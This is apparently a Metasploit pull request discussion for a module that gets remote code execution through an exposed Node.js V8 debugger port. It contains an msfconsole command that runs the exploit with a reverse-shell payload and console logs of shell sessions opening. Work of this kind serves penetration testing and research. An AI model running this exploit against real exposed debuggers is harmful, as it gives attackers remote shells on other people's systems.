Nodejs v8 debugger eval exploit

[coffeetocode]

This module uses the "evaluate" request type of the NodeJS V8
debugger protocol (version 1) to evaluate arbitrary JS resulting
in RCE.

(This is my first exploit PR; any feedback welcome)

Target Setup

Current and historical versions of node (or any JS env based on the V8 JS engine) have this functionality and could be exploitable if configured to expose the JS port on an untrusted interface. In particular, versions of Node released between April 2014 and Aug 2016 incorrectly bound this in default configurations.

Install a version of node using any of the normal methods:

• Vendor: https://nodejs.org/en/download/package-manager/
• Distro: sudo apt-get install nodejs

Alternately, use standard node docker containers as targets:

$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858

(Others at https://hub.docker.com/_/node/)

Tested on Node 7.x, 6.x, 4.x

Verification

Important: Exploiting modern node relies on a (submitted but not yet merged)
bugfix for the nodejs/shell_reverse_tcp payload: #8825
Make sure you have that patch applied before testing against node >= 5.3.0.

1. Run a node process exposing the debug port

node --debug=0.0.0.0:5858 

2. Exploit it and catch the callback:

msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit

(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)

Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.

Example Run

Node 7.x

Victim:

$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)

Attacker:

msf exploit(nodejs_v8_debugger) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700

id
(redacted)

[wvu]

Shouldn't be necessary to call handler explicitly here.

[wvu]

You can drop the explicit return here if you'd like.

[wvu]

https://github.com/rapid7/metasploit-framework/pull/8931/files#r137450427

[wvu]

Your indentation is off here.

[wvu]

Clean first submission. :)

[wvu]

One more return. :)

[coffeetocode]

Is it too late to complain about Ruby's implicit returns? :)

[wvu]

I kind of hate it, tbqh. Same with unless and the lack of parens for method definitions and calls. You can do what you want. :P

[coffeetocode]

@wvu-r7 One thing I couldn't figure out was what target specification to provide that wouldn't include the generic payloads, since they're not applicable here.

Only nodejs code is valid as a drop-in payload, so I wouldn't want the default to be a generic that won't work:

msf exploit(nodejs_v8_debugger) > show payloads

Compatible Payloads
===================

   Name                          Disclosure Date  Rank    Description
   ----                          ---------------  ----    -----------
   generic/custom                                 normal  Custom Payload
   generic/shell_bind_tcp                         normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                      normal  Generic Command Shell, Reverse TCP Inline
   nodejs/shell_bind_tcp                          normal  Command Shell, Bind TCP (via nodejs)
   nodejs/shell_reverse_tcp                       normal  Command Shell, Reverse TCP (via nodejs)
   nodejs/shell_reverse_tcp_ssl                   normal  Command Shell, Reverse TCP SSL (via nodejs)

Thoughts?

[wvu]

Did you want this to be ARCH_NODEJS?

[coffeetocode]

That might be the answer to the question above. Wasn't clear to me from looking at other modules which was the preferred way of specifying. Let me know if you've got a suggestion.

[wvu]

I usually go by the compatible payloads.

[wvu]

generic payloads won't work? They should work given the correct platform and arch.

[coffeetocode]

Nope, my mistake. generic payloads work fine.

msf exploit(nodejs_v8_debugger) > unset payload
Unsetting payload...
msf exploit(nodejs_v8_debugger) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] 127.0.0.1:5858 - Sending 744 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 3 opened

I was remembering that from when I had my target spec goofed up.

[sempervictus]

Neat, thanks, adding to test queue.

[wvu]

While these aren't necessary, since you already have them in the target, the info command won't show platform if it's not top-level. I found this the other day working on the Struts exploit.

[wvu]

Maybe I'll fix this in the library.

[coffeetocode]

PR #8825 was recently merged, so the comment in "Verification" no longer applies; this exploit will now work using master branch.

[wvu]

Yup, thanks to @jmartin-r7 for that. I'll get this landed shortly.

[tdoan-r7]

Release Notes

The NodeJS Debugger Command Injection module has been added to the framework.